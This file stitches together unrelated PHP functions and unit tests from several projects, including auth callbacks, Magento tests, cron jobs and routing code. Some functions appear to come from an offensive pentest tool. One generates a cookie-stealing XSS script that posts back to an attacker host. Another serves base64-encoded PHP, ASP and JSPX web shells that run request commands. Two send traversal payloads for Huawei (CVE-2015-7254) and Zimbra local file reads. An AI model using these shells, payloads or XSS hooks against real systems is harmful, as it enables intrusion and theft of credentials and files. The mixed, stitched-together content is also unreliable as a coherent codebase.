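/**
 * auth service callback
 *
 * Collects the Opauth response over the configured transport, verifies the
 * response signature and hands the result to the configured success or
 * abort callback.
 *
 * @param \Base $f3
 * @param array $params route parameters (unused here)
 * @return void
 */
function callback(\Base $f3, $params)
{
    $Opauth = new \Opauth($this->config, false);
    // Always defined, so an unsupported transport can never reach the
    // validation below with an undefined variable.
    $response = null;
    switch ($Opauth->env['callback_transport']) {
        case 'session':
            $response = $f3->get('SESSION.opauth');
            $f3->clear('SESSION.opauth');
            break;
        case 'post':
            // SECURITY: unserialize() runs on request-supplied data *before* the
            // signature is checked further down. Confirm that the Opauth response
            // is array-only and consider passing ['allowed_classes' => false].
            $response = unserialize(base64_decode($f3->get('POST.opauth')));
            break;
        case 'get':
            // SECURITY: same caveat as the 'post' transport.
            $response = unserialize(base64_decode($f3->get('GET.opauth')));
            break;
        default:
            $f3->error(400, 'Unsupported callback_transport');
            // Stop here even if error() returns instead of terminating.
            return;
    }
    if (isset($response['error'])) {
        $f3->call($this->abortFunc, array($response));
        return;
    }
    // A response without 'auth' is treated as empty and rejected below.
    $data = isset($response['auth']) ? $response['auth'] : null;
    // validate
    if (empty($data) || empty($response['timestamp']) || empty($response['signature']) || empty($data['provider']) || empty($data['uid'])) {
        $f3->error(400, 'Invalid auth response: Missing key auth response components');
    } elseif (!$Opauth->validate(sha1(print_r($data, true)), $response['timestamp'], $response['signature'], $reason)) {
        // $reason is filled in by reference by validate()
        $f3->error(400, 'Invalid auth response: ' . $reason);
    } else {
        // It's all good
        $f3->call($this->successFunc, array($data));
    }
}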
/**
 * A Base validator built with a custom base must accept $input through each
 * public entry point: __invoke(), check() and assert().
 *
 * @dataProvider providerForCustomBase
 * @param mixed $base
 * @param mixed $custom
 * @param mixed $input
 */
public function testCustomBase($base, $custom, $input)
{
    $validator = new Base($base, $custom);
    // Same input, same verdict, regardless of the entry point used.
    foreach (array('__invoke', 'check', 'assert') as $entryPoint) {
        $this->assertTrue($validator->$entryPoint($input));
    }
}
/**
 * getFiles() must return the base-area layout files first, then the
 * theme-area ones, each wrapped in a View\File built by the factory.
 */
public function testGetFiles()
{
    $readDir = $this->getMock('Magento\\Framework\\Filesystem\\Directory\\Read', [], [], '', false);
    $fs = $this->getMock('Magento\\Framework\\App\\Filesystem', ['getDirectoryRead'], [], '', false);
    $fs->expects($this->once())
        ->method('getDirectoryRead')
        ->with(\Magento\Framework\App\Filesystem::MODULES_DIR)
        ->will($this->returnValue($readDir));

    $baseFiles = ['Namespace/One/view/base/layout/one.xml', 'Namespace/Two/view/base/layout/two.xml'];
    // The mocked search also returns a .txt entry; only three results are asserted below.
    $frontendFiles = ['Namespace/Two/view/frontend/layout/four.txt', 'Namespace/Two/view/frontend/layout/three.xml'];
    $readDir->expects($this->at(0))
        ->method('search')
        ->with('*/*/view/base/layout/*.xml')
        ->will($this->returnValue($baseFiles));
    $readDir->expects($this->at(3))
        ->method('search')
        ->with('*/*/view/frontend/layout/*.xml')
        ->will($this->returnValue($frontendFiles));
    $readDir->expects($this->atLeastOnce())
        ->method('getAbsolutePath')
        ->will($this->returnArgument(0));

    $om = $this->getMockForAbstractClass('Magento\\Framework\\ObjectManager');
    $om->expects($this->atLeastOnce())
        ->method('create')
        ->with('Magento\\Framework\\View\\File', $this->anything())
        ->will($this->returnCallback(array($this, 'createFileCallback')));
    $fileFactory = new \Magento\Framework\View\File\Factory($om);

    $theme = $this->getMockForAbstractClass('Magento\\Framework\\View\\Design\\ThemeInterface');
    $theme->expects($this->once())->method('getArea')->will($this->returnValue('frontend'));

    $collector = new Base($fs, $fileFactory, 'layout');
    $files = $collector->getFiles($theme, '*.xml');

    $expectedNames = [$baseFiles[0], $baseFiles[1], $frontendFiles[1]];
    foreach (array_keys($expectedNames) as $index) {
        $this->assertArrayHasKey($index, $files);
        $this->assertInstanceOf('\\Magento\\Framework\\View\\File', $files[$index]);
    }
    foreach ($expectedNames as $index => $name) {
        $this->assertEquals($name, $files[$index]->getFilename());
    }
}
/**
 * @param \Base $f3
 * Description This function will be used to create the necessary script needed to hook a page.
 *
 * Copies the script template to a per-host file under /scripts, rewrites the
 * two placeholder URLs inside it and reports the published script URL.
 */
function create_campaign(\Base $f3)
{
    $web = \Web::instance(); // NOTE(review): assigned but never used here
    $this->response->data['SUBPART'] = 'xssrc_campaign.html';
    if ($f3->get('VERB') == 'POST') {
        $error = false; // NOTE(review): set but never read
        if ($f3->devoid('POST.targetUrl')) {
            $error = true;
            \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
        } else {
            $target_url = $f3->get('POST.targetUrl');
            // The host of the user-supplied URL becomes the script file name.
            // NOTE(review): parse_url() yields null/false when no host is present,
            // which would produce a file literally named ".js"; the value is used
            // in a filesystem path without validation.
            $c_host = parse_url($target_url, PHP_URL_HOST);
            $template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt';
            $campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js';
            $campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
            $postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';
            // NOTE(review): return values of copy()/file_get_contents()/
            // file_put_contents() are not checked, so a failed copy goes unreported.
            copy($template_src, $campaign_file);
            $unprepped_contents = file_get_contents($campaign_file);
            $unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents);
            $unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents);
            file_put_contents($campaign_file, $unprepped_contents);
            // addMessage()'s return value is what is rendered as 'content'.
            // NOTE(review): $campaign_address is inserted into the HTML message unescaped.
            $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
            $this->response->data['content'] = $instructions;
        }
    }
}
/**
 * clear expired cached files
 * >> >php index.php "/cron/deleteExpiredCacheData"
 *
 * Walks the TEMP directory (recursively) for files last modified more than
 * PATHFINDER.CACHE.EXPIRE_MAX seconds ago, unlinks the writable ones and
 * writes a summary line to the cron log.
 *
 * @param \Base $f3
 */
function deleteExpiredData(\Base $f3)
{
    $startedAt = microtime(true);
    // cache dir (dir is recursively searched...)
    $cacheDir = $f3->get('TEMP');
    $cutoff = (int) strtotime('-' . $f3->get('PATHFINDER.CACHE.EXPIRE_MAX') . ' seconds');
    $stats = array('deleted' => 0, 'bytes' => 0, 'readonly' => 0, 'errors' => 0);
    /** @var \SplFileInfo $file */
    foreach (Search::getFilesByMTime($cacheDir, $cutoff) as $file) {
        if (!$file->isWritable()) {
            $stats['readonly']++;
            continue;
        }
        // size must be read before the unlink; it is gone afterwards
        $size = $file->getSize();
        if (unlink($file->getRealPath())) {
            $stats['bytes'] += $size;
            $stats['deleted']++;
        } else {
            $stats['errors']++;
        }
    }
    $elapsed = microtime(true) - $startedAt;
    // Log ------------------------
    $log = new \Log('cron_' . __FUNCTION__ . '.log');
    $log->write(sprintf(self::LOG_TEXT, __FUNCTION__, $stats['deleted'], $stats['bytes'], $stats['readonly'], $stats['errors'], $elapsed));
}
/**
 * Serves one of the stored shell templates, selected by POST.shelltype.
 *
 * The templates are kept base64-encoded and are decoded verbatim; nothing
 * in them is parameterised per request.
 * NOTE(review): $shell_type is read before the VERB check and $error is never used.
 *
 * @param \Base $f3
 */
public function shellGenerator(\Base $f3)
{
    $this->response->data['SUBPART'] = 'websaccre_shellgen.html';
    $pshell = "PD9waHAgDQppZiAoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpeyANCiAgICAkY21kPSgkX1JFUVVFU1RbImNtZCJdKTsgDQogICAgZWNobyBzeXN0ZW0oJGNtZCk7IA0KICAgIGRpZTsgDQp9IA0KPz4=";
    $ashell = "PCUNCklmIChyZXF1ZXN0KCJjbWQiKSA8PiAiIikgVGhlbg0KUmVzcG9uc2UuV3JpdGUgU2VydmVyLkhUTUxFbmNvZGUoc2VydmVyLmNyZWF0ZW9iamVjdCgid3NjcmlwdC5zaGVsbCIpLmV4ZWMoU2VydmVyLk1hcFBhdGgoImNtZC5leGUiKSYgIiAvYyAiICYNCg0KcmVxdWVzdCgiY21kIikpLnN0ZG91dC5yZWFkYWxsKQ0KRW5kIElmDQolPg";
    $jshell = "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";
    $jspx = "PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHhtbG5zOmM9Imh0dHA6Ly9qYXZhLnN1bi5jb20vanNwL2pzdGwvY29yZSIgdmVyc2lvbj0iMi4wIj4NCjxqc3A6ZGlyZWN0aXZlLnBhZ2UgY29udGVudFR5cGU9InRleHQvaHRtbDtjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04Ii8";
    $shell_type = $f3->get('POST.shelltype');
    if ($f3->get('VERB') == 'POST') {
        $error = false;
        // Unknown types fall through to the literal error string in 'content'.
        switch ($shell_type) {
            case "PHP":
                $this->response->data['content'] = base64_decode($pshell);
                break;
            case "ASP":
                $this->response->data['content'] = base64_decode($ashell);
                break;
            case "JSP":
                $this->response->data['content'] = base64_decode($jshell);
                break;
            case "JSPX":
                $this->response->data['content'] = base64_decode($jspx);
                break;
            default:
                $this->response->data['content'] = "Invalid Shell Type Request";
                break;
        }
    }
}
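/**
 * Dispatches the current request to the module named by the URL segments.
 *
 * Includes every shared.php along the module path, then the module's
 * main.php; calls the function named by command() when it exists; and
 * finally pulls in the matching .content template unless an ajax/xml
 * response was requested. Renders an "Invalid Module" page when no main.php
 * exists for the path.
 *
 * @return void
 */
function command_parse()
{
    global $DB, $Core, $Parse, $Security, $Base, $Style;
    if (!$Security->allowed()) {
        return;
    }
    // SECURITY: module() and func() are request-derived and are only checked
    // with file_exists(), which does not reject '..' segments. Confirm they are
    // whitelisted or sanitised before this point.
    $include = implode("/", module());
    if (file_exists("module/{$include}/main.php")) {
        $dir = "";
        foreach (module() as $module) {
            $dir .= "{$module}/";
            $shared = "module/{$dir}shared.php";
            if (file_exists($shared)) {
                include $shared;
            }
        }
        require_once "module/{$include}/main.php";
        // Invoke the command as a variable function rather than through eval():
        // function_exists() already guarantees a plain function name, so the
        // behaviour is identical without the code-generation surface.
        $command = command();
        if (function_exists($command)) {
            $command();
        }
        if (file_exists("module/{$include}/.content/" . func() . ".php")) {
            if (!get('ajax') && !get('xml')) {
                require_once "module/{$include}/.content/" . func() . ".php";
            }
        }
    } else {
        $Base = new Base();
        $Base->title("Invalid Module");
        $Base->Header();
        $Base->Footer();
    }
}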
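/**
 * Stores the posted answers for a question set.
 *
 * @param mixed $set question-set identifier passed to Base::setVars()
 * @return void
 */
public function action_postAnswers($set)
{
    $model = new Base();
    // setVars() is still called for whatever it does to $model (not visible
    // here); its return value was never used.
    $model->setVars($set);
    // The former print_r() of the raw input was debug output that echoed
    // request data straight into the response; removed.
    $model->storeAnswers(Input::get('answers'));
}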
/**
 * Outputs the contest page for the year in the route, falling back to the
 * configured YEAR when the requested year is not listed in YEARS.
 *
 * @param \Base $fat
 */
public static function year(\Base $fat)
{
    $requested = (int) $fat->get('PARAMS.year');
    $known = $fat->get('YEARS');
    // NOTE(review): loose in_array(); fine while YEARS holds ints, confirm otherwise.
    $year = in_array($requested, $known) ? $requested : $fat->get('YEAR');
    echo self::contest($year);
}
/**
 * Check if valid key was sent
 *
 * Reads the apikey query parameter and asks the user DAO whether a user
 * with that key exists.
 *
 * @return bool
 */
public static function validKey()
{
    $apiKey = isset($_GET['apikey']) ? $_GET['apikey'] : null;
    if ($apiKey === null) {
        return false;
    }
    $base = new Base();
    $dao = $base->getDao();
    return $dao->getUserExistsByApiKey($apiKey);
}
/**
 * getAlias() must return whatever setAlias() was last given.
 */
public function testSetAndGetAlias()
{
    $subject = new Base('');
    foreach (array('foo', 'bar') as $alias) {
        $subject->setAlias($alias);
        $this->assertEquals($alias, $subject->getAlias());
    }
}
/**
 * @test
 *
 * With error suppression on, a command exiting non-zero must not abort
 * run(). The negative output check is still missing, hence incomplete.
 */
public function testAssertNotZeroExitSuppressed()
{
    // Command should yield an error
    $failing = "exit 1";
    $this->_obj->expects($this->any())
        ->method('getCommand')
        ->will($this->returnValue($failing));
    $this->_obj->setSuppressErrors(true);
    $this->_obj->run();
    $this->markTestIncomplete("Don't know how to check for the absence of a certain output regex");
}
/**
 * Returns the cached config, building it on first use from the framework
 * hive plus the current xhb id.
 *
 * @return mixed the processed config
 */
protected function _getConfig()
{
    if ($this->_config) {
        return $this->_config;
    }
    $hive = $this->_fw->hive();
    $hive['xhbid'] = $this->getXhbId();
    // presumably populates $this->_config, which is read right after
    $this->_processConfig($hive);
    return $this->_config;
}
/**
 * delete all expired signatures on "inactive" systems
 * >> php index.php "/cron/deleteSignatures"
 *
 * A lifetime of 0 or less (or unset) disables the clean-up. The lifetime is
 * bound as a query parameter, never interpolated into the SQL.
 *
 * @param \Base $f3
 */
function deleteSignatures(\Base $f3)
{
    $lifetime = (int) $f3->get('PATHFINDER.CACHE.EXPIRE_SIGNATURES');
    if ($lifetime <= 0) {
        return;
    }
    $sql = "DELETE `sys` FROM\n `system_signature` `sys` INNER JOIN\n `system` ON \n `system`.`id` = `sys`.`systemId`\n WHERE\n `system`.`active` = 0 AND\n TIMESTAMPDIFF(SECOND, `sys`.`updated`, NOW() ) > :lifetime\n ";
    $pfDB = DB\Database::instance()->getDB('PF');
    $pfDB->exec($sql, ['lifetime' => $lifetime]);
}
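/**
 * POST /post.json
 * Create a new post
 *
 * @todo Allow posting to a buddy's page
 * @param \Base $fw
 */
public function post(\Base $fw)
{
    $userId = self::_requireAuth();
    // Authorisation check: compare as strings with !== instead of the loose
    // != so type juggling (e.g. numeric-prefix strings) cannot satisfy it.
    if ((string) $fw->get('POST.user_id') !== (string) $userId) {
        \App::error(403);
    }
    $post = \Model\Post::create([
        'user_id' => $userId,
        'page_id' => $fw->get('POST.user_id'),
        'content' => $fw->get('POST.content'),
    ]);
    $detail = \App::model('post/detail')->load($post->id);
    $this->_json($detail->cast());
}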
/**
 * Huawei_lfi
 * cve-2015-7254
 * Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI.
 * @param \Base $f3
 * Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab.
 *
 * Sets the page title and passes the posted URL together with the fixed
 * path suffix to uri_based_lfi(), whose result is returned unchanged.
 * NOTE(review): $lfi is instantiated but never used here.
 */
public function huawei_lfi(\Base $f3)
{
    $lfi = new Larfi();
    $f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
    $this->response->data['SUBPART'] = 'lfi_page.html';
    // devoid() flags a missing/empty URL; uri_based_lfi() decides what to do with it
    $blankurl = $f3->devoid('POST.url');
    $url = $f3->get('POST.url');
    $payload = ":37215/icon/../../../etc/defaultcfg.xml";
    return $this->uri_based_lfi($blankurl, $url, $payload);
}
/**
 * Creates 100 invitation codes at the RegPage default level.
 *
 * @param mixed $n NOTE(review): accepted but never used; the count is fixed at 100.
 * @return void
 */
function RegPage_CreateCode($n)
{
    global $zbp;
    $remaining = 100;
    while ($remaining-- > 0) {
        $code = new Base($GLOBALS['RegPage_Table'], $GLOBALS['RegPage_DataInfo']);
        $code->InviteCode = GetGuid();
        $code->Level = $zbp->Config('RegPage')->default_level;
        $code->Save();
    }
}
/**
 * Zimbra Collaboration Server URI Based LFI
 * @param \Base $f3
 *
 * Sets the page title and passes the posted URL together with the fixed
 * path suffix to uri_based_lfi(), whose result is returned unchanged.
 * NOTE(review): $lfi is instantiated but never used here.
 */
public function zimbra_lfi(\Base $f3)
{
    $lfi = new Larfi();
    $f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )');
    $this->response->data['SUBPART'] = 'lfi_page.html';
    // devoid() flags a missing/empty URL; uri_based_lfi() decides what to do with it
    $blankurl = $f3->devoid('POST.url');
    $url = $f3->get('POST.url');
    $payload = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
    return $this->uri_based_lfi($blankurl, $url, $payload);
}
/**
 * Runs the handlers registered under $event for the current request.
 *
 * Patterns are sorted descending after rewriting '@' to '*@', so literal
 * segments sort ahead of token segments; the first pattern that matches the
 * request and has an entry for the current verb is called and its result
 * (compared against FALSE) is returned.
 *
 * @param string $event hook name, defaults to 'before'
 * @return bool true when there is nothing to run or no route matched,
 *              otherwise whether the handler returned something other than FALSE
 */
public function run($event = 'before')
{
    if (!isset($this->routes[$event])) {
        return true;
    }
    // NOTE(review): $paths stays undefined when routes[$event] is an empty array.
    foreach ($keys = array_keys($this->routes[$event]) as $key) {
        $paths[] = str_replace('@', '*@', $key);
    }
    $vals = array_values($this->routes[$event]);
    array_multisort($paths, SORT_DESC, $keys, $vals);
    $this->routes[$event] = array_combine($keys, $vals);
    // Convert to BASE-relative URL
    $req = $this->f3->rel(urldecode($this->f3->URI));
    foreach ($this->routes[$event] as $pattern => $routes) {
        if (!($args = $this->f3->mask($pattern, $req))) {
            continue;
        }
        ksort($args);
        $route = NULL;
        // Prefer the entry for the current sync/ajax mode and verb,
        // otherwise fall back to the entry registered for both modes.
        if (isset($routes[$ptr = $this->f3->AJAX + 1][$this->f3->VERB])) {
            $route = $routes[$ptr];
        } elseif (isset($routes[\Base::REQ_SYNC | \Base::REQ_AJAX])) {
            $route = $routes[\Base::REQ_SYNC | \Base::REQ_AJAX];
        }
        if (!$route) {
            continue;
        }
        if ($this->f3->VERB != 'OPTIONS' && isset($route[$this->f3->VERB])) {
            $parts = parse_url($req);
            // GET with a trailing slash is rerouted to the slash-less path, query kept.
            if ($this->f3->VERB == 'GET' && preg_match('/.+\\/$/', $parts['path'])) {
                $this->f3->reroute(substr($parts['path'], 0, -1) . (isset($parts['query']) ? '?' . $parts['query'] : ''));
            }
            $handler = $route[$this->f3->VERB][0];
            // Without a '/*' wildcard in the pattern, numeric capture keys other
            // than 0 are dropped from the arguments.
            if (is_bool(strpos($pattern, '/*'))) {
                foreach (array_keys($args) as $key) {
                    if (is_numeric($key) && $key) {
                        unset($args[$key]);
                    }
                }
            }
            if (is_string($handler)) {
                // Replace route pattern tokens in handler if any
                $handler = preg_replace_callback('/@(\\w+\\b)/', function ($id) use($args) {
                    return isset($args[$id[1]]) ? $args[$id[1]] : $id[0];
                }, $handler);
                // A 'Class->method' / 'Class::method' handler must name a loadable class.
                if (preg_match('/(.+)\\h*(?:->|::)/', $handler, $match) && !class_exists($match[1])) {
                    $this->f3->error(500, 'PreRoute handler not found');
                }
            }
            // Call route handler
            return $this->f3->call($handler, array($this->f3, $args), 'beforeroute,afterroute') !== FALSE;
        }
    }
    return true;
}
/**
 * @param Base $entity
 * @param string $type
 * @param array $parameters
 * @param bool $withNamespace when true the event name is
 *        namespace + name + '::' + type and entityEventType is recorded;
 *        otherwise it is simply name + type
 */
public function __construct(Base $entity, $type, array $parameters = array(), $withNamespace = false)
{
    if (!$withNamespace) {
        $eventName = $entity->getName() . $type;
    } else {
        $eventName = $entity->getNamespace() . $entity->getName() . '::' . $type;
        $this->entityEventType = $type;
    }
    parent::__construct($entity->getModule(), $eventName, $parameters);
    $this->entity = $entity;
}
/**
 * Renders every root page of the page tree into one concatenated document
 * and stores it in the 'contents' hive key.
 *
 * @param \Base $f3
 */
private function onePager($f3)
{
    $rendered = array();
    foreach ($this->ptService->getTree() as $page) {
        $layoutClass = $this->getLayoutClassForPage($page);
        $layout = new $layoutClass(array($page), $this->lang, $this->tree);
        $rendered[] = $layout->doRender();
    }
    $f3->set('contents', implode('', $rendered));
}
/**
 * POST /register
 *
 * Registers the posted user, stores the returned session token in a cookie
 * and sends the client to /stream. On any exception the message is exposed
 * through the 'error' hive key and a 403 is raised.
 * NOTE(review): catching \Exception surfaces internal messages to the client.
 *
 * @param \Base $fw
 */
function registerPost(\Base $fw)
{
    try {
        $sessionToken = \Helper\Api\User::register($fw->get('POST'));
        $fw->set('COOKIE.session_token', $sessionToken);
        $fw->reroute('/stream');
    } catch (\Exception $failure) {
        $fw->set('error', $failure->getMessage());
        \App::error(403);
    }
}
/**
 * build() emits only the attributes that were supplied: both, href alone,
 * or target alone.
 *
 * @return null
 */
public function testBuild()
{
    $both = '<base href="' . $this->href . '" target="' . $this->target . '">';
    $this->assertEquals($both, $this->base->build());

    $hrefOnly = new BaseTag($this->href);
    $this->assertEquals('<base href="' . $this->href . '">', $hrefOnly->build());

    $targetOnly = new BaseTag(null, $this->target);
    $this->assertEquals('<base target="' . $this->target . '">', $targetOnly->build());
}
/**
 * Shows a single payload; raises a 404 when the id is unknown.
 *
 * @param \Base $f3
 * @param array $params route parameters, 'id' selects the payload
 */
public function viewSingle(\Base $f3, $params)
{
    $this->response->data['SUBPART'] = 'payload_view.html';
    if (!isset($params['id'])) {
        return;
    }
    // parameterised lookup: the id is bound, not interpolated
    $this->resource->load(array('_id = ?', $params['id']));
    if ($this->resource->dry()) {
        $f3->error(404, 'Payload not found');
    }
    $this->response->data['POST'] = $this->resource;
}
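/**
 * Loads a comment into the edit view.
 *
 * @param \Base $f3
 * @param array $params route parameters, 'id' selects the comment
 * @return bool true when the comment was found; false after flashing
 *              "Unknown Comment ID" and rerouting to the previous page
 */
public function getSingle(\Base $f3, $params)
{
    $this->response->data['SUBPART'] = 'comment_edit.html';
    if (isset($params['id'])) {
        // parameterised lookup: the id is bound, not interpolated
        $this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id']));
        if (!$this->resource->dry()) {
            return true;
        }
    }
    \Flash::instance()->addMessage('Unknown Comment ID', 'danger');
    $f3->reroute($f3->get('SESSION.LastPageURL'));
    // Honour the documented bool return should reroute() come back.
    return false;
}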
/**
 * Seeds the hive keys the map page template reads.
 *
 * @param \Base $f3
 */
public function init($f3)
{
    $character = $this->getCharacter();
    $pageVars = array(
        // page title: the character name when one is loaded, otherwise 'Map'
        'pageTitle' => $character ? $character->name : 'Map',
        // main page content
        'pageContent' => false,
        // body element class
        'bodyClass' => 'pf-body',
        // JS main file
        'jsView' => 'mappage',
    );
    foreach ($pageVars as $key => $value) {
        $f3->set($key, $value);
    }
}
/**
 * Deletes the selected record, except the demo admin on the public demo
 * host, then returns to the previous page.
 *
 * @param \Base $f3
 * @param array $params route parameters ('id', 'module')
 */
public function delete(\Base $f3, $params)
{
    $this->resource->reset();
    $flash = \Flash::instance();
    if (isset($params['id'])) {
        $this->resource->load(array('_id = ?', $params['id']));
        $isDemoAdmin = $f3->get('HOST') == 'ikkez.de'
            && !$this->resource->dry()
            && $this->resource->username == 'admin';
        if ($isDemoAdmin) {
            $flash->addMessage("You are not allowed to delete the demo-admin", 'danger');
            $f3->reroute('/admin/' . $params['module']);
            return;
        }
        parent::delete($f3, $params);
    }
    $f3->reroute($f3->get('SESSION.LastPageURL'));
}
/**
 * Resolves $request through this handler, delegating to the successor when
 * this handler cannot process it.
 *
 * @param Request|mixed $request a Request, or a bare key that is wrapped in one
 * @return mixed the request's result
 */
public function get($request)
{
    if (!$request instanceof Request) {
        $wrapped = new Request();
        $wrapped->setKey($request);
        $request = $wrapped;
    }
    $handled = $this->processing($request);
    if (!$handled && $this->_successor) {
        // the successor's return value is ignored; the result lives on $request
        $this->_successor->get($request);
    }
    return $request->getResult();
}
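/**
 * delete connection
 *
 * Deletes every connection id posted in POST.connectionIds on behalf of the
 * active character and answers with an empty JSON array.
 *
 * @param \Base $f3
 * @throws \Exception
 */
public function delete(\Base $f3)
{
    // POST.connectionIds is client input; anything but an array is treated
    // as "nothing to delete" instead of letting foreach() warn on a scalar.
    $connectionIds = $f3->get('POST.connectionIds');
    if (!is_array($connectionIds)) {
        $connectionIds = [];
    }
    $activeCharacter = $this->getCharacter();
    /**
     * @var Model\ConnectionModel $connection
     */
    $connection = Model\BasicModel::getNew('ConnectionModel');
    foreach ($connectionIds as $connectionId) {
        $connection->getById($connectionId);
        // the character is handed to delete(), presumably for an ownership
        // check inside the model; not visible here
        $connection->delete($activeCharacter);
        $connection->reset();
    }
    echo json_encode([]);
}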
/**
 * Opens the PDO connection described by the db_* hive keys and keeps both
 * the framework instance and the handle on the object. PDO errors are
 * raised as exceptions.
 * NOTE(review): the DSN is built from 'db_dns' . 'db_name'; confirm the key name.
 */
function __construct()
{
    $fw = Base::instance();
    $dsn = $fw->get('db_dns') . $fw->get('db_name');
    $handle = new PDO($dsn, $fw->get('db_user'), $fw->get('db_pass'));
    $handle->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $this->f3 = $fw;
    $this->db = $handle;
}